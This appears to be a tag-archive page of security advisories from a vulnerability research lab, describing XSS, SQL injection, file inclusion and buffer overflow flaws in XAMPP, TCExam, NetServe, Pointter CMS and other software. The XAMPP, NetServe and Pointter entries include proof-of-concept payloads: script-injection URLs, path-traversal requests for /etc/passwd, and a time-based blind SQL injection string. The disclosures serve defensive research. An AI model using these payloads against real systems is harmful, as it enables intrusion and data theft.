Posts Tagged ‘ multiple

XAMPP 1.7.7 Multiple URI Based Cross-Site Scripting Vulnerabilities

XAMPP suffers from multiple XSS issues in several scripts that use the ‘PHP_SELF’ variable. The vulnerabilities can be triggered in the ‘xamppsecurity.php’, ‘cds.php’ and ‘perlinfo.pl’ because there isn’t any filtering to the mentioned variable in the affected scripts. Attackers can exploit these weaknesses to execute arbitrary HTML and script code in a user’s browser session.

Tested on: Microsoft Windows XP Professional SP3 (EN)

Vulnerability discovered by Gjoko ‘LiquidWorm’ Krstic
liquidworm gmail com

Advisory ID: ZSL-2011-5054
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5054.php

06.11.2011

http://localhost/security/xamppsecurity.php/”><script>alert(1)</script>
http://localhost/xampp/perlinfo.pl/”><script>alert(1)</script>
http://localhost/xampp/cds.php/”><script>alert(1)</script>

Cotonti CMS v0.9.4 Multiple Remote Vulnerabilities

Input passed via the parameters ‘redirect.php’ in ‘message.php’ and ‘w’ and ‘d’ in ‘index.php’ script are not properly sanitised before being returned to the user or used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code or execute arbitrary HTML and script code in a user’s browser session in context of an affected site. Path disclosure resides in the ‘sq’ parameter in ‘/plugins/search/search.php’ script.

Advisory: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5051.php

Adobe Photoshop Elements 8.0 Multiple Arbitrary Code Execution Vulnerabilities

Photoshop Elements 8 suffers from a buffer overflow vulnerability when dealing with .ABR (brushes) and .GRD (gradients) format files. The application fails to sanitize the user input resulting in a memory corruption, overwriting several memory registers which can aid the atacker to gain the power of executing arbitrary code on the affected system or denial of service scenario.

Tested on:
———-
Microsoft Windows XP Professional Service Pack 3 (English)

Vulnerability discovered by:
—————————-
Gjoko ‘LiquidWorm’ Krstic
Zero Science Lab (http://www.zeroscience.mk)
liquidworm gmail com

Vendor status:
————–
[22.09.2009] Vulnerabilities discovered.
[09.03.2010] Sent detailed info to the vendor with PoC files.
[09.03.2010] Vendor responds with assigned tracking numbers of the issues.
[21.03.2010] Asked vendor for confirmation.
[21.03.2010] Vendor replies confirming the vulnerabilities.
[03.06.2011] Asked vendor for scheduled patch release date.
[05.06.2011] Vendor replies with a scheduled timeframe.
[02.09.2011] Asked vendor for an exact patch release date.
[03.09.2011] Vendor replies.
[09.09.2011] Asked vendor for assigned advisory ID.
[10.09.2011] Vendor tags their Adobe Advisory ID: APSA11-03.
[01.10.2011] Coordinated public security advisory released.

Advisory details:
—————–
Advisory ID: ZSL-2011-5049
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5049.php

Adobe Advisory ID: APSA11-03
Adobe Advisory URL: http://www.adobe.com/support/security/advisories/apsa11-03.html
Adobe PSIRT ID: 447,448

CVE ID: CVE-2011-2443
CVE URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2443

CWE ID: CWE-120
CWE URL: http://cwe.mitre.org/data/definitions/120.html

REF #1: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4939.php
REF #2: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4940.php

Proof Of Concept:
—————–
http://www.zeroscience.mk/codes/brush_gradiently.rar (11071 bytes)

Digital Scribe 1.5 (register_form()) Multiple POST XSS Vulnerabilities

Digital Scribe suffers from multiple POST XSS vulnerabilities. Input thru the POST parameters ‘title’, ‘last’ and ‘email’ in register.php is not sanitized allowing the attacker to execute HTML code into user’s browser session on the affected site.

Details: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5030.php

PG eLMS Pro vDEC_2007_01 Multiple Remote Vulnerabilities (XSS/bSQLi)

XSS: Input passed via the ‘subject’, ‘name’, ‘email’ and ‘body’ parameters to ‘contact_us.php’ script is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user’s browser session in context of an affected site.

bSQLi: Input passed via the ‘lang_code’ GET parameter to index.php and login.php in ‘/www/core/language.class.php’, and ‘login’ POST parameter to login.php is not properly sanitised before being used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

Advisory: ZSL-2011-5027, ZSL-2011-5028

TCExam Multiple Remote Vulnerabilities + Patch

TCExam bellow version 11.2.012 is vulnerable to multiple XSS and SQL Injection attack. Update to version 11.2.012!

TCExam version 11.02.009, 11.2.010 and 11.2.011 tested.

********** Cross-Site Scripting Reflected (script name / parameter(s) / http method) **********

1. /admin/code/tce_colorpicker.php (frm, fld, tag) – GET
2. /admin/code/tce_edit_backup.php (backup_file) – POST
3. /admin/code/tce_edit_group.php (group_name, group_id) – POST
4. /admin/code/tce_edit_module.php (module_id, module_user_id) – POST
5. /admin/code/tce_edit_rating.php (test_id) – POST
6. /admin/code/tce_edit_subject.php (subject_module_id, subject_id) – POST
7. /admin/code/tce_edit_test.php (test_id) – POST
8. /admin/code/tce_filemanager.php (file) – POST
9. /admin/code/tce_select_mediafile.php (frm, fld, file) – GET, GET, POST
10. /admin/code/tce_select_users.php (new_group_id) – POST
11. /admin/code/tce_show_all_questions.php (subject_module_id) – POST
12. /admin/code/tce_show_result_user.php (test_id) – POST
13. /public/code/tce_user_change_email.php (xl_user_email) – POST
14. /public/code/tce_user_change_password.php (xl_newpassword) – POST
15. /public/code/tce_user_registration.php (xl_user_email, xl_newpassword, xl_user_birthdate) – POST

********** Cross-Site Scripting URI Based (script name) **********

1. /admin/code/index.php
2. /admin/code/tce_csv_users.php
3. /admin/code/tce_edit_answer.php
4. /admin/code/tce_edit_backup.php
5. /admin/code/tce_edit_group.php
6. /admin/code/tce_edit_module.php
7. /admin/code/tce_edit_question.php
8. /admin/code/tce_edit_rating.php
9. /admin/code/tce_edit_subject.php
10. /admin/code/tce_edit_test.php
11. /admin/code/tce_edit_user.php
12. /admin/code/tce_filemanager.php
13. /admin/code/tce_import_omr_answers.php
14. /admin/code/tce_import_xml_questions.php
15. /admin/code/tce_import_xml_users.php
16. /admin/code/tce_menu_modules.php
17. /admin/code/tce_menu_tests.php
18. /admin/code/tce_menu_users.php
19. /admin/code/tce_page_info.php
20. /admin/code/tce_select_mediafile.php
21. /admin/code/tce_select_users.php
22. /admin/code/tce_show_all_questions.php
23. /admin/code/tce_show_allresults_users.php
24. /admin/code/tce_show_online_users.php
25. /admin/code/tce_show_result_allusers.php
26. /admin/code/tce_show_result_questions.php
27. /admin/code/tce_show_result_user.php
28. /admin/code/tce_xml_users.php
29. /public/code/index.php
30. /public/code/tce_page_user.php
31. /public/code/tce_user_change_email.php
32. /public/code/tce_user_change_password.php
33. /public/code/tce_user_registration.php

********** Cross-Site Scripting in path (script name) **********

1. /admin/code
2. /public/code

********** SQL Injection (script name / parameter(s) / http method) **********

1. /admin/code/tce_edit_group.php (group_id) – POST
2. /admin/code/tce_edit_module.php (module_id, module_user_id) – POST
3. /admin/code/tce_edit_rating.php (test_id) – POST
4. /admin/code/tce_edit_subject.php (subject_module_id) – POST
5. /admin/code/tce_edit_test.php (test_id) – POST
6. /admin/code/tce_select_users.php (new_group_id) – POST
7. /admin/code/tce_show_all_questions.php (subject_module_id) – POST
8. /admin/code/tce_show_result_questions.php (orderdir, order_field) – POST, GET
9. /admin/code/tce_show_result_user.php (test_id) – POST

********** Possible Cookie Manupulation (script name / parameter(s) / http method) **********

1. /admin/code/tce_edit_group.php (group_id) – POST
2. /public/code/tce_user_registration.php (xl_user_email, xl_newpassword, xl_user_birthdate) – POST

Advisory ZSL-2011-5025: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5025.php
Advisory: ZSL-2011-5026: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5026.php

NetServe Web Server v1.0.58 Multiple Remote Vulnerabilities

NetServe Web Server is vulnerable to multiple vulnerabilities including cross-site scripting, remote file inclusion, local file inclusion, script insertion, html injection, denial of service, etc. Given that the software is not maintained anymore and the last update was in 2006, there are still a few that uses it. All the parameters are susceptible to the above attacks. The list of the parameters used by the web application are(post/get):

– Action
– EnablePasswords
– _Checks
– _ValidationError
– ListIndex
– SiteList_0
– SSIErrorMessage
– SSIExtensions
– SSITimeFormat
– SSIabbrevSize
– EnableSSI
– LogCGIErrors
– LoggingInterval
– ExtendedLogging
– CGITimeOut

The tests were made using PowerFuzzer and OWASP ZAP. Attackers can exploit any of the issues using a web browser.

————snip—————
Remote include in http://127.0.0.1/admin/index.html
with params =Action=ListUpdate&_ValidationError=http%3A%2F%2Fwww.google.com%2F&ListIndex=0&SiteList_0=DEFAULT
coming fromhttp://127.0.0.1/admin/addindex.html
Remote include in http://127.0.0.1/admin/index.html
with params =Action=%2Fetc%2Fpasswd&_ValidationError=addsitelist.html&ListIndex=0&SiteList_0=DEFAULT
coming fromhttp://127.0.0.1/admin/addindex.html
Remote include in http://127.0.0.1/admin/index.html
with params =Action=ListUpdate&_ValidationError=%2Fetc%2Fpasswd&ListIndex=0&SiteList_0=DEFAULT
coming fromhttp://127.0.0.1/admin/addindex.html
Remote include in http://127.0.0.1/admin/index.html
with params =Action=ListUpdate&_ValidationError=addsitelist.html&ListIndex=%2Fetc%2Fpasswd&SiteList_0=DEFAULT
coming fromhttp://127.0.0.1/admin/addindex.html
Remote include in http://127.0.0.1/admin/index.html
with params =Action=ListUpdate&_ValidationError=addsitelist.html&ListIndex=0&SiteList_0=%2Fetc%2Fpasswd
coming fromhttp://127.0.0.1/admin/addindex.html
Remote include in http://127.0.0.1/admin/index.html
with params =Action=%2Fetc%2Fpasswd%00&_ValidationError=addsitelist.html&ListIndex=0&SiteList_0=DEFAULT
coming fromhttp://127.0.0.1/admin/addindex.html
Remote include in http://127.0.0.1/admin/index.html
with params =Action=ListUpdate&_ValidationError=%2Fetc%2Fpasswd%00&ListIndex=0&SiteList_0=DEFAULT
coming fromhttp://127.0.0.1/admin/addindex.html
Remote include in http://127.0.0.1/admin/index.html
with params =Action=ListUpdate&_ValidationError=addsitelist.html&ListIndex=%2Fetc%2Fpasswd%00&SiteList_0=DEFAULT
coming fromhttp://127.0.0.1/admin/addindex.html
Remote include in http://127.0.0.1/admin/index.html
with params =Action=ListUpdate&_ValidationError=addsitelist.html&ListIndex=0&SiteList_0=%2Fetc%2Fpasswd%00
coming fromhttp://127.0.0.1/admin/addindex.html
Remote include in http://127.0.0.1/admin/index.html
with params =Action=c%3A%5C%5Cboot.ini&_ValidationError=addsitelist.html&ListIndex=0&SiteList_0=DEFAULT
coming fromhttp://127.0.0.1/admin/addindex.html
Remote include in http://127.0.0.1/admin/index.html
with params =Action=ListUpdate&_ValidationError=c%3A%5C%5Cboot.ini&ListIndex=0&SiteList_0=DEFAULT
coming fromhttp://127.0.0.1/admin/addindex.html
————snip—————

Advisory ID: ZSL-2011-5021
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5021.php

Tugux CMS 1.2 Multiple Remote Vulnerabilities

The application suffers from multiple issues including: reflected and stored xss, sql Injection, local file inclusion, url redirection. Vulnerable parameters include: ‘name’, ‘comment’, ‘nid’, ‘submit1′, ‘email’, ‘topic_id’.

Advisory: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5014.php

docuFORM Mercury WebApp 6.16a/5.20 Multiple Cross-Site Scripting Vulnerabilities

The Mercury Web Application suffers from multiple XSS vulnerabilities when parsing user input thru the GET parameter ‘this_url’ and the POST parameter ‘aa_sfunc’ in f_state.php, f_list.php, f_job.php and f_header.php scripts. Attackers can exploit these weaknesses to execute arbitrary HTML and script code in a user’s browser session.

Advisory: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5010.php

Pointter PHP Content Management System 1.2 Multiple Vulnerabilities

Pointter PHP Content Management System 1.2 Multiple Vulnerabilities

Vendor: PangramSoft GmbH
Product web page: http://www.pointter.com
Affected version: 1.2

Summary: Pointter PHP Content Management System is an advanced, fast
and user friendly CMS script that can be used to build simple websites
or professional websites with product categorization, product blogs,
member login and search modules. The webmaster can create unlimited
static page boxes, static pages, main categories, sub categories and
product pages.

Desc: Pointter CMS suffers from multiple vulnerabilities (post-auth)
including: Stored XSS, bSQLi, LFI, Cookie Manipulation, DoS.

Tested on: Microsoft Windows XP Pro SP3 (en)

Vulnerabilities discovered by Gjoko ‘LiquidWorm’ Krstic

Advisory ID: ZSL-2011-5002
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5002.php

10.03.2011


XSS:
The stored XSS is pretty much everywhere in the admin panel, just posting the
string ‘”><script>alert(1)</script>’ when editing some category, and on every
return on the main page u get annoyed.

LFI:
script: pointtercms/admin/functions/createcategory.php
post param: category
poc: category=../../../../../../../../../test.txt%00&code=0e=0

script: pointtercms/admin/functions/createpage.php
post param: pageurl

script: pointtercms/admin/functions/createproduct.php
post param: producturl

bSQLi:
script: pointtercms/admin/functions/editsettings.php
post param: onoff, count, boxname, tonoff, tname, monoff, mname, nonoff, nname,
memonoff, memname, searchonoff, searchname, pos, tpos, mpos, npos, mempos, mail.
poc: onoff=1’+and+sleep(10)%23&pos=0
– Response size: 0 bytes, Duration: 10016 ms

Advisory: http://www.zeroscience.mk/mk/vulnerabilities/ZSL-2011-5002.php